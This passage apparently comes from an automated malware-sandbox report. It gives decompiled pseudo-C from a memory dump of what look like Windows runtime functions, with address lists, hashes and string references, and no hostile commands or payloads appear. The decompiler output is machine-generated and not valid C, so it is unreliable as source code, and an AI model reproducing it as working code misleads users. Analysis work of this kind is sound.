							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00AD9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00b151be
0x00b151c3
0x00b151c8
0x00b151cd
0x00b151d0
0x00b151d3
0x00b151d8
0x00b151db
0x00b151de
0x00b151e0
0x00b151e3
0x00b151e6
0x00b151e8
0x00b15342
0x00b15351
0x00b15356
0x00b1535a
0x00b15360
0x00b15363
0x00b15366
0x00b15369
0x00b15369
0x00b1536b
0x00b1536b
0x00b15370
0x00b153a3
0x00b153a4
0x00b153a6
0x00b153ab
0x00b153ab
0x00b153ae
0x00b153ae
0x00b153b5
0x00b153bf
0x00b153bf
0x00b15375
0x00b15396
0x00b153a0
0x00b153a0
0x00000000
0x00b15396
0x00b15377
0x00b15379
0x00b1537f
0x00b1538c
0x00b15390
0x00000000
0x00b15390
0x00b151ee
0x00b151f1
0x00b15301
0x00b15310
0x00b15315
0x00b15318
0x00b1531b
0x00b15320
0x00b1532e
0x00b15331
0x00000000
0x00b15331
0x00b15328
0x00b15329
0x00000000
0x00b15329
0x00b151fa
0x00b15235
0x00b15236
0x00b15239
0x00b1523f
0x00b15240
0x00b15241
0x00b15242
0x00b15246
0x00b15247
0x00b1524e
0x00b15251
0x00b15267
0x00b15269
0x00b1526e
0x00b1527d
0x00b1527e
0x00b15281
0x00b15282
0x00b15287
0x00b15288
0x00b1528a
0x00b1528f
0x00b15294
0x00000000
0x00000000
0x00b1529a
0x00b1529c
0x00b1529e
0x00b1529e
0x00b152a4
0x00b152b0
0x00000000
0x00000000
0x00b152ba
0x00b152bc
0x00b152bc
0x00b152d4
0x00b152d9
0x00b152dc
0x00b152e1
0x00000000
0x00000000
0x00b152e7
0x00b152f4
0x00000000
0x00b152f4
0x00b15270
0x00000000
0x00b15270
0x00b151fc
0x00b151fd
0x00b15202
0x00b15203
0x00b15205
0x00b1520a
0x00b1520f
0x00000000
0x00000000
0x00b1521b
0x00b15226
0x00b1522b
0x00b1521d
0x00b1521d
0x00b15222
0x00b15222
0x00b1522d
0x00000000

Strings

Legacy, xrefs: 00B15226
UEFI, xrefs: 00B1521D

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
Instruction ID: 46b478e4f7f74edddaa6157f2f7423518f9f7b719f94574b3fc2fa95b8a09bc0
Opcode Fuzzy Hash: ab34b8881481cdc59fb161304b616e144e16a8032808e5cfd40ef360672f9252
Instruction Fuzzy Hash: 3D518E71E00A18DFDB24DFA8D980AAEB7F8FF88740F54806DE51AEB251D6709980CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb6f7a8);
				E00AED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00AED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00ADD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00ADF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00AEDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00ADB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L00ADB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00ADE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00ADA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00a9b171
0x00a9b171
0x00a9b171
0x00a9b171
0x00a9b171
0x00a9b176
0x00a9b17b
0x00a9b180
0x00a9b186
0x00a9b18f
0x00a9b198
0x00a9b1a4
0x00a9b1aa
0x00af4802
0x00af4802
0x00af4805
0x00af480c
0x00af480e
0x00a9b1d1
0x00a9b1d3
0x00a9b1de
0x00a9b1de
0x00af4817
0x00af481e
0x00af4820
0x00af4822
0x00af4822
0x00af4824
0x00af4824
0x00af482a
0x00000000
0x00000000
0x00af4835
0x00af483a
0x00af483d
0x00af483f
0x00af4842
0x00af4842
0x00af4842
0x00af4846
0x00af484c
0x00af484e
0x00af4851
0x00af4851
0x00af4853
0x00af4854
0x00af4854
0x00af4858
0x00af485a
0x00af485a
0x00af485d
0x00af485f
0x00af4861
0x00af4861
0x00af4866
0x00af486b
0x00af486e
0x00af4871
0x00af4876
0x00af4876
0x00af4878
0x00af487b
0x00af4884
0x00af4884
0x00000000
0x00af487d
0x00af487d
0x00af4882
0x00af4889
0x00af4889
0x00af488f
0x00af4891
0x00af48e0
0x00af48e2
0x00af48e4
0x00af48e4
0x00af48e7
0x00af48e7
0x00af48ed
0x00af48f4
0x00af48f6
0x00af4951
0x00af4951
0x00af4953
0x00af4953
0x00af4956
0x00af4956
0x00af4958
0x00af4959
0x00af4959
0x00af495d
0x00af495d
0x00af495f
0x00af495f
0x00af4965
0x00af4969
0x00af49ba
0x00af49ba
0x00af49c1
0x00af49c5
0x00af49cc
0x00af49d4
0x00af49d7
0x00af49da
0x00af49e4
0x00af49e5
0x00af49f3
0x00af4a02
0x00000000
0x00af4a02
0x00af4972
0x00af4974
0x00000000
0x00000000
0x00af4976
0x00af4979
0x00af4982
0x00af4983
0x00af4984
0x00af498b
0x00af498d
0x00af4991
0x00af4993
0x00af4999
0x00af499d
0x00af49a2
0x00af49a2
0x00af49a2
0x00af4999
0x00af49ac
0x00000000
0x00af49b3
0x00af48f8
0x00af48fe
0x00000000
0x00000000
0x00000000
0x00af48fe
0x00af4895
0x00af489c
0x00af48ad
0x00af48b2
0x00af48b5
0x00af48b7
0x00af48ba
0x00af48bc
0x00af48c6
0x00af48c6
0x00af48cb
0x00af48d1
0x00af48d4
0x00af48d8
0x00af48d8
0x00000000
0x00af48d8
0x00af48be
0x00af48c0
0x00000000
0x00000000
0x00af48c2
0x00000000
0x00000000
0x00000000
0x00af48c4
0x00000000
0x00af4882
0x00af487b
0x00af4904
0x00af4906
0x00000000
0x00000000
0x00af4908
0x00af490e
0x00000000
0x00000000
0x00af4910
0x00af4917
0x00af4917
0x00000000
0x00af4917
0x00a9b1ba
0x00af47f9
0x00af47fc
0x00000000
0x00000000
0x00000000
0x00af47fc
0x00a9b1c0
0x00a9b1c0
0x00a9b1c3
0x00a9b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00AF48AD

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
Instruction ID: cd523e642eec2f7e471a1e4c3cb6f987b25509f98af985f2b8e0c738cc3c99fa
Opcode Fuzzy Hash: e3e7a1362bcc9e10633d212e73af2abba5d99fd9bb8c8948b1cc6222728acff7
Instruction Fuzzy Hash: AF51C275E102598ADF31CFA8C985BBFBBF0AF08710F2042ADE959AB281D7744D419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00ABB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00ABB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00AB7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00B68CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00AD9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L00ADB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L00ADCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00AB7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L00B68F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L00ADAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xb88628; // 0x0
								_v68 = _t77;
								_t78 =  *0xb8862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xb88628; // 0x0
							_t116 =  *0xb8862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00abb94c
0x00abb956
0x00abb95c
0x00abb95e
0x00abb964
0x00abb969
0x00abb96d
0x00abb96d
0x00abb970
0x00abb974
0x00abb97a
0x00abbadf
0x00abbadf
0x00abbae2
0x00abbae4
0x00abbae6
0x00abbaf0
0x00b02cb8
0x00abbaf6
0x00abbaf6
0x00abbaf6
0x00abbafd
0x00abbb1f
0x00abbb1f
0x00abbaff
0x00abbb00
0x00abbb00
0x00abbb03
0x00abbb03
0x00abbacb
0x00abbacf
0x00abbad0
0x00abbad1
0x00abbadc
0x00abbadc
0x00abb980
0x00abb980
0x00abb988
0x00abb98b
0x00abb98d
0x00abb990
0x00abb993
0x00abb999
0x00abb99b
0x00abb9a1
0x00abb9a5
0x00abb9aa
0x00abb9b0
0x00abb9bb
0x00abb9c0
0x00abb9c3
0x00abb9ca
0x00abb9cc
0x00abb9cf
0x00abb9d3
0x00abb9d7
0x00abba94
0x00abba94
0x00abba98
0x00abbaa3
0x00b02ccb
0x00abbaa9
0x00abbaa9
0x00abbaa9
0x00abbab1
0x00b02cd5
0x00b02cdd
0x00b02cdd
0x00abbabb
0x00abbabc
0x00abbac2
0x00abbac3
0x00abbac3
0x00abbac6
0x00000000
0x00abb9dd
0x00abb9dd
0x00abb9e7
0x00abb9e7
0x00abb9ec
0x00abb9ec
0x00abb9f1
0x00abb9f5
0x00abb9fa
0x00abba00
0x00abba0c
0x00abba10
0x00abba10
0x00abba12
0x00abba18
0x00000000
0x00000000
0x00abbb26
0x00abbb26
0x00abba1e
0x00abba1e
0x00abba23
0x00abba25
0x00abba2c
0x00abba30
0x00abba35
0x00abba35
0x00abba41
0x00abba46
0x00abba4c
0x00abba50
0x00abba54
0x00abba6a
0x00abba6e
0x00abba70
0x00abba74
0x00abba78
0x00abba7a
0x00abba7c
0x00abba8e
0x00abba90
0x00abba92
0x00abbb14
0x00abbb14
0x00abbb16
0x00abbb16
0x00000000
0x00abba7c
0x00abbb0a
0x00abbb0d
0x00000000
0x00000000
0x00000000
0x00abbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABB9A5

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
Instruction ID: 3a64c53f6b461df63e75d6b39453a805e26cf100320b29b17b3b42591713d3b9
Opcode Fuzzy Hash: 66aefe4631f0887f8cbf9373d7bd1e3d4a02c6dfcb91d6f3a197b85d699655d0
Instruction Fuzzy Hash: 66514771A18301CFC720CF28C58096ABBE9FB88740F64496EF59587356DBB1EC44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00AC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t244;
				signed int _t248;
				void* _t249;
				void* _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				intOrPtr* _t304;
				signed int _t306;
				signed int _t310;
				intOrPtr _t322;
				signed int _t331;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;
				void* _t349;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0xb8d360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t338 = 0xb8b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t289 = 0x48;
				_t320 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t331 = 0;
				_v37 = _t320;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t339 = 0xc0000106;
						goto L32;
					} else {
						_t338 = L00AB4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t338;
						__eflags = _t338;
						if(_t338 == 0) {
							_t339 = 0xc0000017;
							goto L32;
						} else {
							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
							_t50 = _t338 + 0x48; // 0x48
							_t333 = _t50;
							_t320 = _v32;
							 *((intOrPtr*)(_t338 + 0x3c)) = _t289;
							_t291 = 0;
							 *((short*)(_t338 + 0x30)) = _v48;
							__eflags = _t320;
							if(_t320 != 0) {
								 *(_t338 + 0x18) = _t333;
								__eflags = _t320 - 0xb88478;
								 *_t338 = ((0 | _t320 == 0x00b88478) - 0x00000001 & 0xfffffffb) + 7;
								E00ADF3E0(_t333,  *((intOrPtr*)(_t320 + 4)),  *_t320 & 0x0000ffff);
								_t320 = _v32;
								_t347 = _t347 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t333 = _t333 + (( *_t320 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E00B239F2(_t333);
									_t320 = _v32;
									_t333 = _t283;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t339 = _v68;
								__eflags = 0;
								 *((short*)(_t333 - 2)) = 0;
								goto L32;
							} else {
								_t293 = _t338 + _t291 * 4;
								_v56 = _t293;
								do {
									__eflags = _t320;
									if(_t320 != 0) {
										_t244 =  *(_v60 + _t303 * 4);
										__eflags = _t244;
										if(_t244 == 0) {
											goto L30;
										} else {
											__eflags = _t244 == 5;
											if(_t244 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t293 =  *(_v60 + _t303 * 4);
										 *(_t293 + 0x18) = _t333;
										_t248 =  *(_v60 + _t303 * 4);
										__eflags = _t248 - 8;
										if(_t248 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t248 * 4 +  &M00AC2959))) {
												case 0:
													__ax =  *0xb88488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00ADF3E0(__edi,  *0xb8848c, __ax & 0x0000ffff);
														__eax =  *0xb88488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00ADF3E0(_t333, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0xb88480 & 0x0000ffff = E00ADF3E0(__edi,  *0xb88484,  *0xb88480 & 0x0000ffff);
													__eax =  *0xb88480 & 0x0000ffff;
													__eax = ( *0xb88480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00ADF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00ADF3E0(_t333, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t333 = _t333 + (_t278 >> 1) * 2 + 2;
													__eflags = _t333;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t333 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx =  *0xb8575c;
													__eflags = __ebx - 0xb8575c;
													if(__ebx != 0xb8575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00ADF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xb8575c;
														} while (__ebx != 0xb8575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xb88478 & 0x0000ffff = E00ADF3E0(__edi,  *0xb8847c,  *0xb88478 & 0x0000ffff);
													__eax =  *0xb88478 & 0x0000ffff;
													__eax = ( *0xb88478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00B239F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xb86e58 & 0x0000ffff = E00ADF3E0(__edi,  *0xb86e5c,  *0xb86e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xb86e58 & 0x0000ffff;
													__eax = ( *0xb86e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t320 = _v32;
													L29:
													_t293 = _t293 + 4;
													__eflags = _t293;
													_v56 = _t293;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t248 =  *(_v60 + _t331 * 4);
						if(_t248 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t248 * 4 +  &M00AC2935))) {
							case 0:
								__ax =  *0xb88488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t320 =  &_v64;
								_v80 = E00AC2E3E(0,  &_v64);
